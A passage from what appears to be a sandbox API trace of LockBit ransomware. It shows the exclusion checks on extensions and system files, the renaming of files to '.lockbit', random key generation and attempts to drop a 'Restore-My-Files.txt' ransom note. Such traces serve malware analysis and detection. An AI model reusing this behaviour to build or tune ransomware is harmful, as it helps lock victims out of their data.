hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x78e4, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="Informix.xsl", cAlternateFileName="")) returned 1 [0097.620] lstrcmpiW (lpString1=".", lpString2="Informix.xsl") returned -1 [0097.620] lstrcmpiW (lpString1="..", lpString2="Informix.xsl") returned -1 [0097.620] PathFindExtensionW (pszPath="Informix.xsl") returned=".xsl" [0097.620] lstrcmpiW (lpString1=".386", lpString2=".xsl") returned -1 [0097.620] lstrcmpiW (lpString1=".cmd", lpString2=".xsl") returned -1 [0097.620] lstrcmpiW (lpString1=".exe", lpString2=".xsl") returned -1 [0097.620] lstrcmpiW (lpString1=".ani", lpString2=".xsl") returned -1 [0097.620] lstrcmpiW (lpString1=".adv", lpString2=".xsl") returned -1 [0097.620] lstrcmpiW (lpString1=".theme", lpString2=".xsl") returned -1 [0097.620] lstrcmpiW (lpString1=".msi", lpString2=".xsl") returned -1 [0097.620] lstrcmpiW (lpString1=".msp", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".com", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".diagpkg", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".nls", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".diagcab", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".lock", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".ocx", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".mpa", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".cpl", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".mod", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".hta", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".icns", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".prf", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".rtp", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".diagcfg", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".msstyles", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".bin", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".shs", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".drv", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".wpx", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".bat", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".rom", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".msc", lpString2=".xsl") returned -1 [0097.621] lstrcmpiW (lpString1=".spl", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".ps1", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".msu", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".ics", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".key", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".mp3", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".reg", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".dll", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".ini", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".idx", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".sys", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".ico", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".lnk", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".rdp", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1=".lockbit", lpString2=".xsl") returned -1 [0097.622] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Informix.xsl") returned 1 [0097.622] lstrcmpiW (lpString1="ntldr", lpString2="Informix.xsl") returned 1 [0097.622] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Informix.xsl") returned 1 [0097.622] lstrcmpiW (lpString1="bootsect.bak", lpString2="Informix.xsl") returned -1 [0097.622] lstrcmpiW (lpString1="autorun.inf", lpString2="Informix.xsl") returned -1 [0097.622] lstrcmpiW (lpString1="thumbs.db", lpString2="Informix.xsl") returned 1 [0097.622] lstrcmpiW (lpString1="iconcache.db", lpString2="Informix.xsl") returned -1 [0097.622] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\") returned="" [0097.623] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned=".xsl" [0097.623] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0097.623] lstrcmpiW (lpString1=".7z", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".ckp", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".dacpac", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".db", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".db-shm", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".db-wal", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".db3", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".dbc", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".dbs", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".dbt", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".dbv", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".frm", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".mdf", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".mrg", lpString2=".xsl") returned -1 [0097.623] lstrcmpiW (lpString1=".mwb", lpString2=".xsl") returned -1 [0097.624] lstrcmpiW (lpString1=".myd", lpString2=".xsl") returned -1 [0097.624] lstrcmpiW (lpString1=".ndf", lpString2=".xsl") returned -1 [0097.624] lstrcmpiW (lpString1=".qry", lpString2=".xsl") returned -1 [0097.624] lstrcmpiW (lpString1=".sdb", lpString2=".xsl") returned -1 [0097.624] lstrcmpiW (lpString1=".sdf", lpString2=".xsl") returned -1 [0097.625] lstrcmpiW (lpString1=".sql", lpString2=".xsl") returned -1 [0097.625] lstrcmpiW (lpString1=".sqlite", lpString2=".xsl") returned -1 [0097.625] lstrcmpiW (lpString1=".sqlite3", lpString2=".xsl") returned -1 [0097.625] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xsl") returned -1 [0097.625] lstrcmpiW (lpString1=".tmd", lpString2=".xsl") returned -1 [0097.625] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.lockbit") returned 89 [0097.625] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0097.637] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.637] malloc (_Size=0x40068) returned 0x1ff1e60 [0097.637] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=30948) returned 1 [0097.637] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0097.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0097.643] ReadFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0097.653] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.653] malloc (_Size=0xc8) returned 0x77d800 [0097.653] NtSetInformationFile (FileHandle=0x3b0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc8, FileInformationClass=0xa) returned 0x0 [0097.654] free (_Block=0x77d800) [0097.654] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 1 [0097.654] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt") returned 89 [0097.654] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.654] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x712e, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="msjet.xsl", cAlternateFileName="")) returned 1 [0097.654] lstrcmpiW (lpString1=".", lpString2="msjet.xsl") returned -1 [0097.654] lstrcmpiW (lpString1="..", lpString2="msjet.xsl") returned -1 [0097.654] PathFindExtensionW (pszPath="msjet.xsl") returned=".xsl" [0097.654] lstrcmpiW (lpString1=".386", lpString2=".xsl") returned -1 [0097.654] lstrcmpiW (lpString1=".cmd", lpString2=".xsl") returned -1 [0097.654] lstrcmpiW (lpString1=".exe", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".ani", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".adv", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".theme", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".msi", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".msp", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".com", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".diagpkg", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".nls", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".diagcab", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".lock", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".ocx", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".mpa", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".cpl", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".mod", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".hta", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".icns", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".prf", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".rtp", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".diagcfg", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".msstyles", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".bin", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".shs", lpString2=".xsl") returned -1 [0097.655] lstrcmpiW (lpString1=".drv", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".wpx", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".bat", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".rom", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".msc", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".spl", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".ps1", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".msu", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".ics", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".key", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".mp3", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".reg", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".dll", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".ini", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".idx", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".sys", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".ico", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".lnk", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".rdp", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1=".lockbit", lpString2=".xsl") returned -1 [0097.656] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="msjet.xsl") returned 1 [0097.656] lstrcmpiW (lpString1="ntldr", lpString2="msjet.xsl") returned 1 [0097.656] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="msjet.xsl") returned 1 [0097.657] lstrcmpiW (lpString1="bootsect.bak", lpString2="msjet.xsl") returned -1 [0097.657] lstrcmpiW (lpString1="autorun.inf", lpString2="msjet.xsl") returned -1 [0097.657] lstrcmpiW (lpString1="thumbs.db", lpString2="msjet.xsl") returned 1 [0097.657] lstrcmpiW (lpString1="iconcache.db", lpString2="msjet.xsl") returned -1 [0097.657] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\") returned="" [0097.657] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned=".xsl" [0097.657] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0097.657] lstrcmpiW (lpString1=".7z", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".ckp", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".dacpac", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".db", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".db-shm", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".db-wal", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".db3", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".dbc", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".dbs", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".dbt", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".dbv", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".frm", lpString2=".xsl") returned -1 [0097.657] lstrcmpiW (lpString1=".mdf", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".mrg", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".mwb", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".myd", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".ndf", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".qry", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".sdb", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".sdf", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".sql", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".sqlite", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".sqlite3", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xsl") returned -1 [0097.658] lstrcmpiW (lpString1=".tmd", lpString2=".xsl") returned -1 [0097.658] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.lockbit") returned 86 [0097.658] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0097.659] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.659] malloc (_Size=0x40068) returned 0x3ef0008 [0097.659] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=28974) returned 1 [0097.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.662] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0097.662] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.665] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0097.665] ReadFile (in: hFile=0x3b4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0097.841] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.841] malloc (_Size=0xc2) returned 0x77d800 [0097.841] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0099.306] free (_Block=0x77d800) [0099.306] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 1 [0099.306] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt") returned 89 [0099.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0099.306] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x851c, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="sql2000.xsl", cAlternateFileName="")) returned 1 [0099.307] lstrcmpiW (lpString1=".", lpString2="sql2000.xsl") returned -1 [0099.307] lstrcmpiW (lpString1="..", lpString2="sql2000.xsl") returned -1 [0099.307] PathFindExtensionW (pszPath="sql2000.xsl") returned=".xsl" [0099.307] lstrcmpiW (lpString1=".386", lpString2=".xsl") returned -1 [0099.307] lstrcmpiW (lpString1=".cmd", lpString2=".xsl") returned -1 [0099.307] lstrcmpiW (lpString1=".exe", lpString2=".xsl") returned -1 [0099.307] lstrcmpiW (lpString1=".ani", lpString2=".xsl") returned -1 [0099.307] lstrcmpiW (lpString1=".adv", lpString2=".xsl") returned -1 [0099.307] lstrcmpiW (lpString1=".theme", lpString2=".xsl") returned -1 [0099.307] lstrcmpiW (lpString1=".msi", lpString2=".xsl") returned -1 [0099.307] lstrcmpiW (lpString1=".msp", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".com", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".diagpkg", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".nls", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".diagcab", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".lock", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".ocx", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".mpa", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".cpl", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".mod", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".hta", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".icns", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".prf", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".rtp", lpString2=".xsl") returned -1 [0099.585] lstrcmpiW (lpString1=".diagcfg", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".msstyles", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".bin", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".shs", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".drv", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".wpx", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".bat", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".rom", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".msc", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".spl", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".ps1", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".msu", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".ics", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".key", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".mp3", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".reg", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".dll", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".ini", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".idx", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".sys", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".hlp", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".ico", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".lnk", lpString2=".xsl") returned -1 [0099.586] lstrcmpiW (lpString1=".rdp", lpString2=".xsl") returned -1 [0099.703] lstrcmpiW (lpString1=".lockbit", lpString2=".xsl") returned -1 [0099.703] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="sql2000.xsl") returned -1 [0099.703] lstrcmpiW (lpString1="ntldr", lpString2="sql2000.xsl") returned -1 [0099.703] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="sql2000.xsl") returned -1 [0099.703] lstrcmpiW (lpString1="bootsect.bak", lpString2="sql2000.xsl") returned -1 [0099.703] lstrcmpiW (lpString1="autorun.inf", lpString2="sql2000.xsl") returned -1 [0099.703] lstrcmpiW (lpString1="thumbs.db", lpString2="sql2000.xsl") returned 1 [0099.703] lstrcmpiW (lpString1="iconcache.db", lpString2="sql2000.xsl") returned -1 [0099.704] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\") returned="" [0099.704] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned=".xsl" [0099.704] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0099.704] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0099.704] lstrcmpiW (lpString1=".7z", lpString2=".xsl") returned -1 [0099.704] lstrcmpiW (lpString1=".ckp", lpString2=".xsl") returned -1 [0099.704] lstrcmpiW (lpString1=".dacpac", lpString2=".xsl") returned -1 [0099.704] lstrcmpiW (lpString1=".db", lpString2=".xsl") returned -1 [0099.704] lstrcmpiW (lpString1=".db-shm", lpString2=".xsl") returned -1 [0099.704] lstrcmpiW (lpString1=".db-wal", lpString2=".xsl") returned -1 [0099.704] lstrcmpiW (lpString1=".db3", lpString2=".xsl") returned -1 [0099.704] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0099.704] lstrcmpiW (lpString1=".dbc", lpString2=".xsl") returned -1 [0099.704] lstrcmpiW (lpString1=".dbs", lpString2=".xsl") returned -1 [0099.721] lstrcmpiW (lpString1=".dbt", lpString2=".xsl") returned -1 [0099.721] lstrcmpiW (lpString1=".dbv", lpString2=".xsl") returned -1 [0099.721] lstrcmpiW (lpString1=".frm", 